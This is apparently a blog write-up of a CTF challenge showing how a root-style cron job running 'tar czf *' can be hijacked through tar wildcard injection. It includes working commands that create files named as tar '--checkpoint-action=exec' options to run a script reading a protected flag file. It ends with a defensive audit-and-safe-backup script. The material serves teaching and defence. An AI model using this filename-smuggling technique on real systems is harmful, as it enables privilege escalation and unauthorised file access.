CREATIVE CHAOS   ▋ blog

Constant Backup Policy (misc)

PUBLISHED ON 17/11/2020 — EDITED ON 11/12/2023 — 247CTF, INFOSEC

Instructions

Our admins take their backup policies very seriously. Every single second they “/bin/tar czf *” our entire home directory. Can you trick the admins into leaking the flag?

Intelligence

  1. We can see that the superuser runs a backup.
  2. We know what command they run.
  3. How can a tar wildcard be exploited?

Poking around

First, let's check who we are:

bash-4.3$ whoami
notroot

Is there anything interesting in our home directory?

bash-4.3$ cd /home/notroot/
bash-4.3$ ls

What is running on the system?

bash-4.3$ ps
PID   USER     TIME   COMMAND
    1 root       0:25 {supervisord} /usr/bin/python2 /usr/bin/supervisord -c /etc/supervisord.conf
    9 flag       0:07 {cron.sh} /bin/sh /home/flag/cron.sh
   10 notroot    0:00 /usr/bin/ttyd -g 1000 -u 1000 -x /bin/bash
 6046 notroot    0:00 /bin/bash
28646 flag       0:00 /bin/tar czf /home/flag/backup.tar *
28647 flag       0:00 /bin/sh -c gzip
28648 notroot    0:00 ps

That /home/flag looks promising; let's investigate:

bash-4.3$ cd /home/
bash-4.3$ ls
flag     notroot
bash-4.3$ ls flag/
backup.tar                cron.sh                   flag_c6b0057b3d798b0.txt
bash-4.3$ cat flag/flag_c6b0057b3d798b0.txt
cat: can't open 'flag/flag_c6b0057b3d798b0.txt': Permission denied
bash-4.3$ ls -la flag/
total 12
drwxr-sr-x    1 flag     flag            24 Nov 17 16:11 .
drwxr-xr-x    1 root     root            33 Nov 16 10:55 ..
-rw-r--r--    1 flag     flag           197 Nov 17 16:11 backup.tar
-r-x------    1 flag     flag           134 Jan 25  2020 cron.sh
-r--------    1 flag     flag            41 Jan 25  2020 flag_c6b0057b3d798b0.txt

Exploit

Let's check what we can do with tar and wildcards. You can search the web for the technique, or look at tar's own help output for hints:

bash-4.3$ tar --help
...
--checkpoint[=NUMBER]  display progress messages every NUMBERth record
                       (default 10)
--checkpoint-action=ACTION   execute ACTION on each checkpoint
...

Since the superuser executes the “backup” command over the whole of /home, we can place the exploit in our home folder:

bash-4.3$ cd /home/notroot/
bash-4.3$ echo 'cat /home/flag/flag_c6b0057b3d798b0.txt > /tmp/flag.txt' > exploit.sh
bash-4.3$ echo "" > "--checkpoint-action=exec=sh exploit.sh"
bash-4.3$ echo "" > --checkpoint=1

Basically, we want tar to treat our filenames as command-line parameters and run whatever we put into exploit.sh. In our case, we know the flag is stored in /home/flag/flag_c6b0057b3d798b0.txt and we want to write it to a file. Be careful: the destination must be somewhere the flag user can write, which is why we choose /tmp/flag.txt. Using ~/flag.txt won't work, as flag has no permission to write in /home/notroot. We know this from the ps output above, which shows that tar is run by the flag user.

We wait a second for the cron job to run, then read the flag:

bash-4.3$ cat /tmp/flag.txt
247CTF{xxx}
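From the admin's side, the lesson is that an unquoted `*` hands every filename in the directory to tar as an argument. Below is an added example (not part of the original writeup or the challenge's cron.sh) that audits a directory for option-shaped names and runs the backup in a form where a filename can never be parsed as an option; the sample home directory and its file names are constructed.

```shell
#!/bin/sh
# Added example, not from the challenge: defensive counterpart to "tar czf backup.tar *".

# List entries whose names begin with '-'. These are exactly the names an
# unquoted '*' would pass to tar as options (e.g. --checkpoint=1).
option_like_entries() {
    dir="$1"
    for entry in "$dir"/*; do
        name="${entry##*/}"
        case "$name" in
            -*) printf '%s\n' "$name" ;;
        esac
    done
}

# Safe equivalent of 'cd "$dir" && tar czf "$archive" *':
#   -C enters the directory, '--' ends option parsing, and '.' archives
#   everything as ./name, so no member name can ever start with '-'.
safe_backup() {
    src="$1"
    archive="$2"
    tar czf "$archive" -C "$src" -- .
}

# Constructed demo directory: one normal file plus an option-shaped name
# like the one used in the writeup (nothing in it executes anything).
make_sample_home() {
    home="$(mktemp -d)"
    : > "$home/notes.txt"
    : > "$home/--checkpoint=1"
    printf '%s\n' "$home"
}
```

Running `option_like_entries` before the backup gives the admin a cheap alert, and `safe_backup` removes the problem even when the audit is skipped.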
